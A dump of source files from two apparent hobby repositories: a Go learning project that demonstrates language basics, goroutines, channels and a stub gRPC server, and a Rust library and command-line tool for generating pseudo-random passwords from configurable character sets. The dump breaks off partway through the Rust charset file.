	fmt.Println("Currency with EUR value replaced with NOK: ", currency)
	// Iterating through a range in the map
	for key, value := range currency {
		fmt.Printf("%v might be equal to: %v\n", key, value)
	}
	// Iterating through only keys
	for key := range currency {
		fmt.Printf("%v is a currency in the map", key)
	}
	testStructs()
}
// STRUCTS
// basically like a class in C# or other languages
type anotherPerson struct {
	firstName string `json:"firstName" yaml:"firstName"` // Tagging can be added for serialization
	lastName  string
	age       int
}

type animal struct {
	name            string
	characteristics []string
}

// testStructs walks through struct literals, nested structs, and
// anonymous struct types.
func testStructs() {
	p1 := anotherPerson{
		firstName: "Goofy",
		lastName:  "",
		age:       0,
	}
	fmt.Println("A person struct: ", p1)
	animal1 := animal{
		name: "Lion",
		characteristics: []string{
			"Eats humans",
			"Wild animal",
			"Carnivore",
		},
	}
	// Use dot(.) to access each field in the struct
	fmt.Println("Animal name: ", animal1.name)
	// Iterate through all the values in a collection
	for _, v := range animal1.characteristics {
		fmt.Printf("\t %v\n", v) // \t is the escape sequence for TAB
	}
	// Promotion ...
	// NOTE(review): this is composition via a *named* field; true Go field
	// promotion requires embedding (an anonymous field).
	type herbivore struct {
		animal   animal
		eatHuman bool
	}
	// ... A struct within a struct
	herbi := herbivore{
		animal: animal{
			name: "Goat",
			characteristics: []string{
				"Lacks sense",
				"Eats grass",
			},
		},
		eatHuman: false,
	}
	fmt.Println("\nThis animal:")
	fmt.Println("Eats human? ", herbi.eatHuman) // False
	// Anonymous struct
	bio := struct {
		firstName string
		friends   map[string]int
		favDrinks []string
	}{
		firstName: "Steven",
		friends: map[string]int{
			"Tim":   12345678,
			"Adbul": 23456789,
		},
		favDrinks: []string{
			"Pepsi Max",
			"Tea",
		},
	}
	fmt.Println("Bio: ", bio.firstName)
	// Iterating through all the keys and values in a map of an anonymous struct
	for k, v := range bio.friends {
		fmt.Println(k, v)
	}
	// Iterating through all the keys and values in a slice of an anonymous struct
	for k, v := range bio.favDrinks {
		fmt.Println(k, v)
	}
	callFunctions()
}
// FUNCTIONS
// Functions can be values, since Go in itself is functional.
// callFunctions demonstrates defer ordering (LIFO), multiple return
// values, and functions as first-class values.
func callFunctions() {
	defer LastHi() // Defer postpones a function to run last
	defer func() { // The defers works like a stack, and will be reversed in order...
		// ... adding LastHi() first, and then this one on top, executing this one before LastHi()
		fmt.Println("Almost last hi")
	}()
	a := Hello()
	fmt.Println(a) // Hello, there
	// Initializing both values short-hand
	b, c := TwoValues()
	fmt.Println(b, c) // Hello world
	// Functions as values
	d := TwoValues
	fmt.Println(d()) // Hello world
	testReceivers()
}
// Function functionName() return type { ... }
// Hello returns a fixed greeting string.
func Hello() string {
	greeting := "Hello, there"
	return greeting
}

// TwoValues demonstrates returning multiple values from one function.
func TwoValues() (string, string) {
	return "Hello", "world"
}

// public void FunctionName()
// LastHi prints a final greeting; used as a deferred call elsewhere.
func LastHi() {
	fmt.Println("Last HI!")
}
// RECEIVERS
// Calling a function using standard parameters will make a copy, and return the copy value.
// To mutate our values, we need to pass it along with a reference (e *Employee)
type Employee struct {
	FirstName, LastName string
}

// Standard way of sending in information to a function and specifying the return type
// function functionName(param1 type, param2 type) (returnValue returnType)
// NOTE(review): concatenates without a separating space (unlike the
// fullName *method* below, which inserts one).
func fullName(firstName string, lastName string) (fullName string) {
	fullName = firstName + lastName
	return fullName
}

// testReceivers contrasts value receivers with pointer receivers.
func testReceivers() {
	e := Employee{
		FirstName: "X Æ A-12",
		LastName:  "Musk",
	}
	fmt.Println("Son's name was", fullName(e.FirstName, e.LastName))
	e.changeFirstName("X Æ A-Xii")
	fmt.Println("Son's name is now", fullName(e.FirstName, e.LastName))
	fmt.Println("Son's name is now", e)
	testInterfaces()
}

// For quicker access to fields
func (e Employee) fullName() string {
	return e.FirstName + " " + e.LastName // More string concatenation too!
}

// For modifying the internals of the struct.
// Pointer receiver: mutations through e are visible to the caller.
func (e *Employee) changeFirstName(firstName string) {
	e.FirstName = firstName
}
// INTERFACES
// Implementation of interfaces is implicit, rather than explicit like for C#.
// Interfaces are very popular in Go.
type Shape interface {
	Area() float64
	Perimeter() float64
}

// Rect implicitly satisfies Shape by implementing both methods.
type Rect struct {
	width  float64 // The struct implements Shape implicit
	height float64 // The struct implements Shape implicit
}

// Area returns width * height.
func (r Rect) Area() float64 {
	return r.width * r.height
}

// Perimeter returns the perimeter of the rectangle.
// BUG FIX: the original computed 2 * (width * height) — twice the area —
// instead of 2 * (width + height).
func (r Rect) Perimeter() float64 {
	return 2 * (r.width + r.height)
}
// Package-level Shape used to show interface assignment below.
var s Shape

// testInterfaces assigns a concrete Rect to a Shape variable and compares
// interface and concrete values.
func testInterfaces() {
	s = Rect{width: 5.0, height: 4.0}
	r := Rect{5.0, 4.0} // We don't have to use names, just send the values in the order of the struct fields
	fmt.Printf("Type of s is %T\n", s)
	fmt.Printf("value of s is %v\n", s)
	fmt.Println("area of rectangle s", s.Area())
	fmt.Println("s == r is", s == r)
	printArea(r)
	testStrings()
}

// printArea accepts any Shape and prints its area.
func printArea(s Shape) {
	fmt.Printf("Area of shape is: %v", s.Area())
}

// TYPE CHECKING/CONVERSION
// Everything is a type, also interfaces.
// testStrings drives the two type-switch demos below.
func testStrings() {
	explain("Hello world")
	explain(52)
	explain(true)
	explain2("Hello world 2")
	testPointers()
}

// We can infer types at runtime
func explain(i interface{}) { // Using empty interface to infer the type of i and then checking it in the switch
	fmt.Println("Type checking with interface i as parameter: ")
	switch i.(type) {
	case string:
		fmt.Println("i stored string ", strings.ToUpper(i.(string))) // Need to cast
	case int:
		fmt.Println("i stored int", i)
	default:
		fmt.Println("i stored something else", i)
	}
}

// explain2 is the idiomatic form: binding the switch expression to a
// variable gives each case a correctly-typed value, so no cast is needed.
func explain2(i interface{}) {
	// Shorter
	switch i := i.(type) { // Assigning i.(type) to a variable declares the type of that variable beforehand
	case string:
		fmt.Println("i stored string ", strings.ToUpper(i)) // No need to cast
	case int:
		fmt.Println("i stored int", i)
	default:
		fmt.Println("i stored something else", i)
	}
}
// POINTERS
type OriginalType struct {
	firstName string
	lastName  string
}

// changeNameVal receives a copy; the caller's struct is untouched.
func changeNameVal(ot OriginalType) {
	ot.firstName = "Unchanged" // This will not change the original struct, just make a copy and return the new value
}

// changeOriginalName mutates the caller's struct through a pointer.
func changeOriginalName(ot *OriginalType) {
	ot.firstName = "Karl"
}

// changeSecondItemVal receives an array copy (arrays are value types).
func changeSecondItemVal(arr [5]int) {
	arr[1] = 1
}

// changeSecondItem mutates the caller's array through a pointer.
func changeSecondItem(arr *[5]int) {
	arr[1] = 1
}

// changeSecondItemSlice mutates through the slice header's shared backing array.
func changeSecondItemSlice(arr []int) {
	arr[1] = 1
}

// "main"
func testPointers() {
	fmt.Println("Testing pointers")
	originalType := OriginalType{
		firstName: "Ola",
		lastName:  "Nordmann",
	}
	changeNameVal(originalType) // Do not change the original struct, only returns a copy
	fmt.Println("Did not change", originalType)
	changeOriginalName(&originalType) // Needs a receiver of the original (&) using memory address
	fmt.Println("Did change", originalType)
	// Arrays is sent by value, slices are sent by reference by default
	// Slices, maps and channels are sent by reference by default - no need to create reference
	var a = [5]int{} // Array
	changeSecondItemVal(a)
	fmt.Println("Did not change the original: ", a) // Unchanged ([0, 0, 0, 0, 0])
	changeSecondItem(&a)
	fmt.Println("Changed!", a) // This will change as it has a receiver ([0, 1, 0, 0, 0])
	var b = []int{0, 0, 0, 0}
	changeSecondItemSlice(b)
	fmt.Println("Changed clice by val..?", b) // Changed, even though we sent by value, not reference ([0, 1, 0, 0, 0])
	fmt.Println("b changed because it's a slice, and slices, maps, and channels are always sent by reference, not copy-value. Arrays sends by value")
	testGoroutines()
}

// GOROUTINES AND CHANNELS
// Goroutines are functions declared with go functionName()
// The for loops will all start a new goroutine in the background, running them separately,
// not returning 0123456789, but still correct behavior
func printHi() {
	fmt.Println("Hi")
}

// testGoroutines shows why loop variables must be passed into goroutines
// explicitly: the first loop deliberately races on the shared `i`.
func testGoroutines() {
	fmt.Println("Testing Goroutines: \"Hi\" is a return value of a goroutine 'printHi()'")
	go printHi()
	fmt.Println("Hi2")
	// Hi will sometimes not be printed...
	var wg sync.WaitGroup
	wg.Add(10)
	// This returns weird results
	// because it uses the i in the for loop as a copy.
	// NOTE(review): intentional data race for demonstration — the closure
	// captures the loop variable by reference (pre-Go 1.22 semantics).
	for i := 0; i < 10; i++ {
		go func() {
			fmt.Print(i) // 101010101033101010
			wg.Done()
		}() // returnvalue
	}
	wg.Wait()
	// Testing again
	wg.Add(10)
	for i := 0; i < 10; i++ {
		go func(i int) {
			fmt.Print(i) //7126403985 all numbers from 0-9 printed
			wg.Done()
		}(i) // returnvalue
	}
	wg.Wait()
	wg.Add(10)
	for i := 0; i < 10; i++ {
		go printNum(i, &wg) // 4207186395
	}
	wg.Wait()
	//
	fmt.Println("Always pass in a parameter in the goroutine")
	testChannels()
}

// printNum prints i and marks one unit of work done on the WaitGroup.
func printNum(i int, wg *sync.WaitGroup) { // Passing in the waitgroup by reference
	fmt.Print(i)
	wg.Done()
}
// CHANNELS
// Allows putting data inside the channels and pull data out of those channels in a thread safe way
// Good for passing information in and out of goroutines
// Channel operator: <-
// The data flows in the direction of the arrow
func testChannels() {
	fmt.Println("Testing channels")
	simple()
}

// simple: one goroutine writes a value; the main goroutine reads it.
func simple() {
	somechan := make(chan int)    // Making a new channel with the make keyword, of type int
	go func() { somechan <- 1 }() // Creating a goroutine that is going to write to the channel
	a := <-somechan               // From the outside we can create a variable that reads from the channel
	fmt.Println(a)                // And then print it
	blocking()
}

// Channels are blocking
// Channels can't hold data, so I need to get the data from the channel before the application can continue
// We need a goroutine in the background getting the value from a channel immediately after I put something in the channel
// Channels are also used for blocking and syncing the flow
func blocking() {
	someChan := make(chan bool)
	// someChan <- true - this will be blocked
	// <-someChan - as well as this
	go func() { // If we removed this function, we could not read anything in the print
		someChan <- true // because nothing is trying to write to the channel
	}() // this would cause a deadlock, resulting in an error, since the application would never finish
	fmt.Println(<-someChan) // Code will start executing from here once func blocking() is called,
	// the goroutine will be running, putting a value into the channel,
	// making us able to print the value.
	// Else, the execution would wait until the channel had a value
	buffered()
}

// Buffered channels are able to hold value
func buffered() {
	someChan := make(chan bool, 1) // Declaring a channel with one slot, meaning it can hold a single value
	someChan <- true               // No block, the channel can hold one value
	fmt.Println(<-someChan)
	brokenFor()
}

// brokenFor shows that the last send may never be printed: execution can
// move on before the background reader runs again.
func brokenFor() {
	someChan := make(chan int)
	go func() {
		// Infinite loop in the background
		for {
			fmt.Println(<-someChan)
		}
	}() // void
	someChan <- 1 // 1
	someChan <- 2 // 2
	someChan <- 3 //
	// 3 will not be printed, because after assigning 3 to the channel, the program exits
	chanRange()
}

// Q: Why can you assign 3 values to a channel here and print all the values? Can a channel hold multiple values if they're closed?
// how do the channel know that it's being closed ahead of time? Shouldn't value 1 and 2 be discarded?
// No wait, the goroutine will assign 1 to the channel, then it will block. The for loop will read channel value 1, and get blocked
// the goroutine will assign 2, and so on. I think.
func chanRange() {
	someChan := make(chan int)
	go func() {
		someChan <- 1   // 1
		someChan <- 2   // 2
		someChan <- 3   // 3
		close(someChan) // This will work
	}()
	for val := range someChan { // This will read from the channel as it's being assigned to
		fmt.Println(val)
	}
	closingChan()
}

// closingChan demonstrates reads from a closed channel.
func closingChan() {
	// Closing a channel
	someChan := make(chan int)
	close(someChan)
	// Writing to a close chan will be panic, crash the program and exit
	// someChan <- 3
	// Reading from a closed channel will always succeed
	// first will be zero-value
	// second will be bool indicating if the channel is open
	val, b := <-someChan
	fmt.Printf("Val is: %v, is open: %v\n", val, b) //0, false
	// Range will read from the channel until _, bool returns false
	// Rule of thumb:
	// ONLY THE CREATOR OF A CHANNEL, CLOSES THE CHANNEL
	broadcastChan()
}
// broadcastChan fans ten values out of one channel to two competing
// reader goroutines (each value is received by exactly one reader).
func broadcastChan() {
	var wg sync.WaitGroup
	ch := make(chan int)
	wg.Add(2) // One WaitGroup unit per reader goroutine.
	go func(c <-chan int) {
		for i := range c { // Drains c until it is closed.
			fmt.Println("1st goroutine: ", i)
		}
		// Next line happens only if c is closed
		wg.Done()
	}(ch)
	go func(c <-chan int) {
		for i := range c { // Drains c until it is closed.
			// BUG FIX: this goroutine previously logged "1st goroutine"
			// too (copy-paste), making the output impossible to read.
			fmt.Println("2nd goroutine: ", i)
		}
		// Next line happens only if c is closed
		wg.Done()
	}(ch)
	// Sends the value 1 ten times (note: sends the literal 1, not i).
	for i := 0; i < 10; i++ {
		ch <- 1
	}
	close(ch)
	// BUG FIX: wait for both readers to finish. The original Add(2)/Done
	// pair was never Wait()ed, so the tail of the output could be lost
	// when the program exited.
	wg.Wait()
}
<file_sep>package main
import (
"fmt"
"log"
"net"
//chat "github.com/pynezz/chat"
chat "github.com/pynezz/hello-go/chat"
hello "github.com/pynezz/hello-go/hello_world"
basics "github.com/pynezz/hello-go/the_basics"
"google.golang.org/grpc"
)
// Demo state shared by the helper functions below.
var age int
var name string = "Kevin"

// main greets the configured user and then starts the gRPC chat server.
// The commented-out calls exercise the other demo packages.
func main() {
	// runPackageHello_Go()
	// printFromBasics(name, 24)
	message, err := hello.RandomGreeting(name)
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(message)
	fmt.Println(("Starting gRPC server..."))
	startServer()
	//scraper()
}
// startServer exposes the (unimplemented) ChatService over gRPC on :9000.
// It blocks in Serve until the listener fails; errors are fatal.
func startServer() {
	lis, err := net.Listen("tcp", ":9000")
	if err != nil {
		log.Fatalf("Failed to listen on port 9000: %v", err)
	}
	s := chat.UnimplementedChatServiceServer{}
	grpcServer := grpc.NewServer()
	chat.RegisterChatServiceServer(grpcServer, &s)
	// BUG FIX: announce before Serve. The original printed "Server
	// started" *after* Serve returned, which never happens on the success
	// path (Serve blocks) and is skipped on failure (log.Fatalf exits).
	fmt.Println("Server started")
	if err := grpcServer.Serve(lis); err != nil {
		log.Fatalf("Failed to serve gRPC server over port 9000: %v", err)
	}
}
// printFromBasics forwards to the basics demo package, which builds a
// Person from name/age and prints it.
func printFromBasics(name string, age int) {
	basics.PrintPerson(name, age)
}
// printString sets the package-level age, prints it, then prints the
// result of addTwoInts(2, 2).
func printString() {
	age = 24
	fmt.Printf("\nMy age: %d \n", age)
	added := addTwoInts(2, 2)
	fmt.Printf("2 + 2 = %v", added)
}
// addTwoInts returns the sum of i and j.
// The original wrapped the addition in a needless local closure that was
// defined and immediately called; a direct return is equivalent.
func addTwoInts(i int, j int) int {
	return i + j
}
// runPackageHello_Go exercises the hello package's struct-based greeting,
// then runs the printString demo.
func runPackageHello_Go() {
	h := hello.Hello{
		Hello: "Hey",
	}
	h.Hello_Go()
	printString()
}
// Notes:
<file_sep>package hello
import (
"errors"
"fmt"
"math/rand"
"time"
)
// Hello carries a configurable greeting word.
type Hello struct {
	Hello string
}

// Hello_Go prints the greeting word followed by ", Go!".
func (h Hello) Hello_Go() {
	fmt.Printf("%s, Go!", h.Hello)
}
// RandomGreeting returns a greeting addressed to name, using a randomly
// chosen message format. An empty name is rejected with an error.
func RandomGreeting(name string) (string, error) {
	if name == "" {
		return name, errors.New("empty name")
	}
	return fmt.Sprintf(randomFormat(), name), nil
}

// init seeds the global PRNG so the chosen format varies between runs.
func init() {
	rand.Seed(time.Now().UnixNano())
}

// randomFormat picks one of the known greeting formats at random.
func randomFormat() string {
	formats := []string{
		"Hello, %v. Welcome!",
		"Great to see you, %v!",
		"How you doin %v",
	}
	return formats[rand.Intn(len(formats))]
}
<file_sep>package main
/*
CREDIT: TutorialEdge [Beginners Guide to gRPC in Go!] - https://www.youtube.com/watch?v=BdzYdN_Zd9Q
*/
import (
"log"
"net"
chat "github.com/pynezz/hello-go/chat"
"google.golang.org/grpc"
)
// StartServer exposes the (unimplemented) ChatService over gRPC on :9000.
// NOTE(review): this duplicates startServer in main.go — keep one of them.
// Blocks in Serve until the listener fails; errors are fatal.
func StartServer() {
	lis, err := net.Listen("tcp", ":9000")
	if err != nil {
		log.Fatalf("Failed to listen on port 9000: %v", err)
	}
	s := chat.UnimplementedChatServiceServer{}
	grpcServer := grpc.NewServer()
	chat.RegisterChatServiceServer(grpcServer, &s)
	if err := grpcServer.Serve(lis); err != nil {
		log.Fatalf("Failed to serve gRPC server over port 9000: %v", err)
	}
}
<file_sep># hello-go
<a href="https://golang.org">
<img src="https://blog.golang.org/go-brand/Go-Logo/SVG/Go-Logo_Blue.svg" alt="golang.org" height="100">
</a>
###### Go 1.16.3
## This is a repository where I explore [Go](https://golang.org)!
### Syntax
- PascalCase is for exported (public) functions, and camelCase for private. ([Documentation](https://golang.org/ref/spec#Exported_identifiers))
- := declares a new inferred type
- type declaration is reversed as from C#
- No need for parentheses in if statements
- No need for semicolons at the ends of statements — the lexer inserts them automatically, unless multiple statements share one line
Go functions:
```golang
func function(i int) {
// code goes here
}
```
C# methods:
```csharp
void Method(int i)
{
// code goes here
}
```
### Sources
#### Go - golang.org
- [Getting Started - *docs*](https://golang.org/doc/tutorial/getting-started)
- [Create Module - *docs*](https://golang.org/doc/tutorial/create-module)
- [Random Greeting - *docs*](https://golang.org/doc/tutorial/random-greeting)
- [Package fmt - *pkg/fmt*](https://golang.org/pkg/fmt/#Printf)
- [Effective Go - *docs*](https://golang.org/doc/effective_go)
---
#### Go - other sources
- [The blank identifier in Golang - golangdocs.com](https://golangdocs.com/blank-identifier-in-golang)
- [How to build a web scraper using golang with colly - dev.to/vianeltxt](https://dev.to/vianeltxt/how-to-build-a-web-scraper-using-golang-with-colly-18lh)
- [go-colly.org](http://go-colly.org/)
##### Github
- [Awesome Go](https://github.com/avelino/awesome-go)
-----
#### Markdown
- [markdownguide.org](https://www.markdownguide.org/)
#### misc
First Google result for the term 'go semicolon' yielded possibly one of the earliest questions about Go on Stack Overflow, dated 2 days after the first official announcement (November 12th, 2009)
- [StackOverflow outdated question about semicolon placement](https://stackoverflow.com/questions/1719999/why-do-i-need-a-semicolon-here)
- [This is what I was looking for - *golang.org | docs/effective_go#semicolons](https://golang.org/doc/effective_go#semicolons)
#### gRPC
- [Protocol Buffer install - grpc.io](https://grpc.io/docs/protoc-installation/)
- [Go quick start - grpc.io](https://grpc.io/docs/languages/go/quickstart/) | 1b72fa86a4de9dfd836e59ec7e2bfb5c3499f865 | [
"Markdown",
"Go"
] | 6 | Go | pynezz/hello-go | 179ab923c6956756762bf6cd159af237b6153a8f | 12ec123097be987bb9b16acdc18911789fe67c65 |
refs/heads/main | <repo_name>xgillard/passg<file_sep>/passg-lib/src/lib.rs
//! This library provides a convenient way to generate pseudorandom passwords
//! according to some given constraints.
//!
//! # Example
//! ```
//! use passg_lib::prelude::*;
//! let generator = GeneratorBuilder::default().build().unwrap();
//! let password = generator.generate();
//! ```
// DOC FIX: the doctest used `use passg::prelude::*`, but the crate is
// named `passg-lib` (identifier `passg_lib`), and `build()` on a
// derive_builder-generated builder returns a Result, so the original
// example did not compile as a doctest.

pub mod charsets;
pub mod errors;
pub mod generator;

/// A prelude you can use to easily get started
pub mod prelude {
    pub use super::charsets::{Alpha, CollatingSeq, Digit, Special};
    pub use super::errors::Error;
    pub use super::generator::{Generator, GeneratorBuilder};
}
<file_sep>/passg-lib/src/errors.rs
//! This module defines the error that might occur while using passg.
/// These are the errors that can occur while generating a password
#[derive(Debug, Clone, PartialEq, Eq, Hash, thiserror::Error)]
pub enum Error {
#[error("could not parse")]
ParseError(String),
}
<file_sep>/passg-lib/src/generator.rs
//! This module defines the type used to configure and generate passwords
use derive_builder::Builder;
use rand::Rng;
use crate::charsets::{Alpha, CollatingSeq, Digit, Special};
/// This is the structure you'll use to generate a random password
/// This is the structure you'll use to generate a random password.
///
/// Build one via the derive_builder-generated `GeneratorBuilder`; the
/// `#[builder(default = ...)]` attributes mirror `Generator::default()`.
#[derive(Debug, Builder)]
pub struct Generator {
    /// Number of characters in the generated password.
    #[builder(default = "20")]
    length: usize,
    /// Which alphabetic characters are allowed.
    #[builder(default = "Alpha::Dist")]
    alpha: Alpha,
    /// Which digits are allowed.
    #[builder(default = "Digit::Dist")]
    digit: Digit,
    /// Which special characters are allowed.
    #[builder(default = "Special::Basic")]
    special: Special,
}
impl Default for Generator {
    // NOTE(review): these literals duplicate the #[builder(default = ...)]
    // attributes on the struct; keep the two in sync.
    fn default() -> Self {
        Generator {
            length: 20,
            alpha: Alpha::Dist,
            digit: Digit::Dist,
            special: Special::Basic,
        }
    }
}
impl Generator {
    /// Generates a new random password as per specified configuration.
    ///
    /// Panics if the configuration allows no characters at all (empty
    /// charset), exactly as the original did.
    pub fn generate(&self) -> String {
        let charset = self.charset();
        // Hoist the RNG out of the loop: the original fetched
        // `rand::thread_rng()` once per character, which is needless work
        // (the output distribution is unchanged).
        let mut rng = rand::thread_rng();
        let mut out = String::with_capacity(self.length);
        for _ in 0..self.length {
            let idx = rng.gen_range(0..charset.len());
            out.push(charset[idx]);
        }
        out
    }

    /// Returns a vector comprising only those characters that can be used
    /// to generate a new password.
    fn charset(&self) -> Vec<char> {
        // `extend_from_slice` replaces the three hand-written copy loops.
        let mut chars = Vec::new();
        chars.extend_from_slice(self.alpha.characters());
        chars.extend_from_slice(self.digit.characters());
        chars.extend_from_slice(self.special.characters());
        chars
    }
}
<file_sep>/passg-tool/Cargo.toml
[package]
edition = "2018"
name = "passg-tool"
version = "0.1.0"
description = "Generate pseudo-random passwords from the command line"
license = "MIT"
readme = "README.md"
repository = "https://github.com/xgillard/passg"
categories = ["command-line-utilities", "authentication"]
keywords = ["password"]
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
passg-lib = {version = "0.1.0", path = "../passg-lib"}
structopt = "0.3.23"
<file_sep>/passg-tool/src/main.rs
use passg_lib::prelude::*;
use structopt::StructOpt;
/// PassGen is a tool that lets you generate pseudo-random passwords from
/// the command line.
#[derive(Debug, StructOpt)]
struct Args {
/// The length of the password
#[structopt(short, long, default_value = "20")]
length: usize,
/// What kind of alphabetic characters do you want to allow ?
/// (all = 'all', none = 'none', easily distinguished = 'dist' [eg removes O vs 0],
/// lower case = 'lower', upper case = 'upper')
#[structopt(short, long, default_value = "dist")]
alpha: Alpha,
/// What kind of numeric characters do you want to allow ?
/// (all = 'all', none = 'none', easily distinguished = 'dist' [eg removes O vs 0])
#[structopt(short, long, default_value = "dist")]
digit: Digit,
/// What kind of special characters do you want to allow ?
/// (all = 'all', none = 'none', the most common ones = 'basic')
#[structopt(short, long, default_value = "basic")]
special: Special,
}
impl From<Args> for Generator {
    /// Translate parsed CLI arguments into a configured password Generator.
    fn from(args: Args) -> Generator {
        GeneratorBuilder::default()
            .length(args.length)
            .alpha(args.alpha)
            .digit(args.digit)
            .special(args.special)
            .build()
            .expect("Could not build a password generator") // will not occur
    }
}

// Entry point: parse args, build the generator, print one password.
fn main() {
    let generator = Generator::from(Args::from_args());
    println!("{}", generator.generate());
}
<file_sep>/README.md
# PassGen
PassGen is a simple command line tool to generate pseudo-random passwords
matching a desired set of simple constraints.
## Usage (as a library)
The crate's documentation gives an example on how to generate a random password.
Basically, you will want to do something along these lines:
```rust
use passg::prelude::*;
let generator = GeneratorBuilder::default()
.alpha(Alpha::Dist) // this is the default
.digit(Digit::Dist) // this is the default
.special(Special::Basic) // this is the default
.build()
.expect("This is never going to fail")
```
## Usage (as a tool)
```
passg 0.2.0
PassGen is a tool that lets you generate pseudo-random passwords from the command line
USAGE:
passg [OPTIONS]
FLAGS:
-h, --help Prints help information
-V, --version Prints version information
OPTIONS:
-a, --alpha <alpha> What kind of alphabetic characters do you want to allow ? (all = 'all', none = 'none',
easily distinguished = 'dist' [eg removes O vs 0], lower case = 'lower', upper case =
'upper') [default: dist]
-d, --digit <digit> What kind of numeric characters do you want to allow ? (all = 'all', none = 'none',
easily distinguished = 'dist' [eg removes O vs 0]) [default: dist]
-l, --length <length> The length of the password [default: 20]
-s, --special <special> What kind of special characters do you want to allow ? (all = 'all', none = 'none', the
most common ones = 'basic') [default: basic]
```
<file_sep>/passg-lib/README.md
# PassG-lib
PassG-lib is a simple crate to help you generate pseudo-random passwords
matching a desired set of simple constraints.
## Usage
The crate's documentation gives an example on how to generate a random password.
Basically, you will want to do something along these lines:
```rust
use passg_lib::prelude::*;
let generator = GeneratorBuilder::default()
.alpha(Alpha::Dist) // this is the default
.digit(Digit::Dist) // this is the default
.special(Special::Basic) // this is the default
.build()
.expect("This is never going to fail")
```<file_sep>/Cargo.toml
[workspace]
members = [
'passg-lib',
'passg-tool',
]
<file_sep>/passg-lib/Cargo.toml
[package]
edition = "2018"
name = "passg-lib"
version = "0.1.0"
description = "Generate pseudo-random passwords"
license = "MIT"
readme = "README.md"
repository = "https://github.com/xgillard/passg"
categories = ["authentication"]
keywords = ["password"]
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
derive_builder = "0.10.2"
rand = "0.8.4"
structopt = "0.3.23"
thiserror = "1.0.28"
<file_sep>/passg-lib/src/charsets.rs
//! This module configures the collating sequences (aka charsets) that are
//! available for generating a pseudo-random password.
use std::str::FromStr;
use crate::errors::Error;
// -----------------------------------------------------------------------------
// GLOBAL CONSTANTS
// -----------------------------------------------------------------------------
/// The empty charset
static NONE: [char; 0] = [];
/// The lowercase alphabetic
static ALPHA_LOWER: [char; 26] = [
    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',
    't', 'u', 'v', 'w', 'x', 'y', 'z',
];
/// The upper case alphabetic
static ALPHA_UPPER: [char; 26] = [
    'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',
    'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
];
/// All alphabetic characters
static ALPHA_ALL: [char; 52] = [
    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',
    't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L',
    'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
];
/// Only easily distinguished characters
/// (drops 'l', 'O' and 'Z', which are easy to confuse with '1', '0' and '2').
static ALPHA_DIST: [char; 49] = [
    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
    'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
    'N', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
];
/// All digits
static DIGIT_ALL: [char; 10] = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'];
/// Only the digits that are easily distinguished (drops 0, 1 and 2).
static DIGIT_DIST: [char; 7] = ['3', '4', '5', '6', '7', '8', '9'];
/// *All* (actually, a small subset) the special characters
static SPECIAL_ALL: [char; 29] = [
    '#', '@', '&', '"', '\'', '(', '§', '!', ')', '-', '_', '¨', '^', '*', '$', '€', '%', '£', '`',
    '<', '>', '?', ',', '.', ';', ':', '/', '+', '=',
];
/// Only the most common (easiest to distinguish) special characters
static SPECIAL_BASIC: [char; 19] = [
    '#', '@', '&', '(', '!', ')', '-', '_', '*', '$', '%', '?', ',', '.', ';', ':', '/', '+', '=',
];
// -----------------------------------------------------------------------------
// THE VARIOUS DEFINED CHARSETS
// -----------------------------------------------------------------------------
/// A collating sequence: a named set of characters from which a
/// pseudo-random password may be generated.
pub trait CollatingSeq {
/// Returns all characters belonging to this charset (may be empty).
fn characters(&self) -> &[char];
}
/// The alphabetic (letter) charsets a password may draw from.
///
/// A variant can be obtained from its textual aliases through the
/// `FromStr` implementation below.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
pub enum Alpha {
/// Both lower and upper case letters.
All,
/// Only letters that are easy to tell apart: drops the ambiguous
/// glyphs 'l', 'O' and 'Z' (confusable with '1', '0' and '2').
Dist,
/// Lower case letters only.
Lower,
/// Upper case letters only.
Upper,
/// No letters at all.
None,
}
impl FromStr for Alpha {
    type Err = Error;

    /// Parses a (case-insensitive) textual alias into an [`Alpha`] charset.
    ///
    /// Accepted aliases:
    /// * `All`:   "*", "a", "all", "any", "b", "both"
    /// * `Dist`:  "d", "e", "easy", "dist"
    /// * `Lower`: "l", "lc", "lower", "lower-case"
    /// * `Upper`: "u", "uc", "upper", "upper-case"
    /// * `None`:  "0", "n", "none"
    ///
    /// Any other input yields an `Error::ParseError` carrying the
    /// offending string.
    fn from_str(s: &str) -> Result<Self, Self::Err> {
        match s.to_lowercase().as_str() {
            // "b"/"both" were documented on `Alpha::All` but previously
            // rejected by the parser; they are now accepted as well.
            "*" | "a" | "all" | "any" | "b" | "both" => Ok(Self::All),
            "d" | "e" | "easy" | "dist" => Ok(Self::Dist),
            "l" | "lc" | "lower" | "lower-case" => Ok(Self::Lower),
            "u" | "uc" | "upper" | "upper-case" => Ok(Self::Upper),
            "0" | "n" | "none" => Ok(Self::None),
            _ => Err(Error::ParseError(s.to_string())),
        }
    }
}
/// The numeric (digit) charsets a password may draw from.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
pub enum Digit {
/// All ten decimal digits.
All,
/// Only digits that are easy to tell apart: excludes '0', '1' and '2'
/// (confusable with 'O', 'l' and 'Z').
Dist,
/// No digits at all.
None,
}
impl FromStr for Digit {
    type Err = Error;

    /// Parses a case-insensitive textual alias into a [`Digit`] charset:
